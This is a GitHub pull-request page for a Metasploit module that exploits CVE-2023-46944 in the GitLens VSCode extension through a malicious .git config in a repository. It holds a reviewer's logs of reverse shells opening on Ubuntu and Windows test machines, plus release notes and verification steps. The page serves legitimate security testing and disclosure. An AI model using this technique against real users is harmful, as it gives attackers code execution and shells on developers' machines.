GitLens (VSCode Extension) exploit module (cve-2023-46944) #18997
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
h00die
changed the title
jheysel-r7
reviewed
Apr 17, 2024
There was a problem hiding this comment.
Another great module, thanks @h00die. Testing was as expected.
VSCode 1.87.2 on Ubuntu 22.04 with GitLens 13.6.0 installed
msf6 exploit(multi/fileformat/gitlens_local_config_exec) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[+] repo.zip stored at /Users/jheysel/.msf4/local/repo.zip
[*] Waiting for shell
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.131:57296) at 2024-04-17 09:04:16 -0700
id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
sysinfo
sh: 4: sysinfo: not found
uname -a
Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.16.199.131 - Command shell session 1 closed.
VSCode 1.87.2 on Windows 10 Pro with GitLens 13.6.0 installed
msf6 exploit(multi/fileformat/gitlens_local_config_exec) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[+] repo.zip stored at /Users/jheysel/.msf4/local/repo.zip
[*] Waiting for shell
[*] Sending stage (336 bytes) to 172.16.199.135
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.135:50197) at 2024-04-17 10:32:59 -0700
Shell Banner:
Microsoft Windows [Version 10.0.19045.2965]
-----
C:\Users\msfuser>
C:\Users\msfuser>whoami
whoami
desktop-n3oru31\msfuser
C:\Users\msfuser>systeminfo
systeminfo
Host Name: DESKTOP-N3ORU31
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md
Show resolved
Hide resolved
jheysel-r7
closed this pull request by merging all changes
into
rapid7:master
in
bcaa535
jheysel-r7
added
the
rn-modules
Release NotesThis adds a FileFormat exploit for VSCode. The VSCode extension GitLens by GitKraken before v.14.0.0 allows an untrusted workspace to execute git commands. A repo may include its own .git folder including a malicious config file to execute arbitrary code. |
7 tasks
8 tasks
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
commands. A repo may include its own .git folder including a malicious config file to
execute arbitrary code.
Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10
Verification
use exploit/multi/fileformat/gitlens_local_config_execrunREADME.mdfile and put the cursor on the first line.